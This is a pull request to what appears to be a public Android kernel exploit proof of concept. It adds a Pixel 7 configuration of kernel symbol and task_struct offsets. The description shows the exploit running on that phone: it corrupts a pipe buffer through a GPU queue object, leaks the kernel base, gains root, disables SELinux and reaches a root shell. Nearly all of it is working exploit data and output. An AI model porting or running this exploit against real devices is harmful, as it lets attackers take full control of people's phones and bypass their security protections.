### PR TITLE
Add Pixel 7 config.

### DIFF
--- a/poc.cpp
+++ b/poc.cpp
@@ -128,6 +128,20 @@ struct device_config dev_conf[] = {
                 0x00000000000004c8,     /* offsetof task_struct->tasks          */
                 __page_to_virt,
                 __virt_to_page
+        },
+
+        [3] = {                 /* Pixel 7 */
+                "google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys",
+                0xD10203FFD503233F,     /* 1st 8 bytes of _stext                */
+                0xA9027BFDF800865E,     /* 2nd 8 bytes of _stext                */
+                0x00000000031308d0,     /* kthread_task sym_off                 */
+                0x0000000003185970,     /* selinux_state sym_off                */
+                0x000000000236cd28,     /* anon_pipe_buf_ops sym_off */
+                0x0000000000000780,     /* offsetof task_struct->cred           */
+                0x00000000000005c8,     /* offsetof task_struct->pid              */
+                0x00000000000004c8,     /* offsetof task_struct->tasks          */
+                __page_to_virt,
+                __virt_to_page
         }
 
 };


### PR DESCRIPTION
I just confirmed that the offsets for the  Pixel 7 Pro  SPL Nov-23 match with the offsets on my Pixel 7 (panther:14/UP1A.231105.003/11010452).

```
panther:/ $ /data/local/tmp/gpu_exploit
[+] Target device: 'google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys' 0xd10203ffd503233f 0xa9027bfdf800865e
[+] Got the kcpu_id (0) kernel address = 0xffffff8927434000  from context (0x0)
[+] Got the kcpu_id (255) kernel address = 0xffffff8030358000  from context (0xff)
[+] Found corrupted pipe with size 0xfff
[+] SUCCESS! we have a fake pipe_buffer (0)!
10 40 43 27 89 FF FF FF  10 40 43 27 89 FF FF FF  | .@C'.....@C'....
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 10 74 13 C0 FF FF FF  00 00 00 00 00 00 00 00  | ..t.............
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
[+] Freeing kcpu_id = 0 (0xffffff8927434000)[+] Allocating 61 pipes with 256 slots
[+] Successfully overlapped the kcpuqueue object with a pipe buffer
00 13 A0 00 FF FF FF FF  00 00 00 00 30 00 00 00  | ............0...
28 CD 57 06 E9 FF FF FF  10 00 00 00 00 00 00 00  | (.W.............
00 00 00 00 00 00 00 00                           | ........
[+] pipe_buffer {.page = 0xffffffff00a01300, .offset = 0x0, .len = 0x30, ops = 0xffffffe90657cd28}
[+] kernel base = 0xffffffe904210000, kthreadd_task = 0xffffff8003595c80 selinux_state = 0xffffffe907395970
[+] Found our own task struct 0xffffff8848a05c80
[+] Successfully got root: getuid() = 0 getgid() = 0
[+] Successfully disabled SELinux
[+] Cleanup  ... OK
panther:/ # whoami
root
```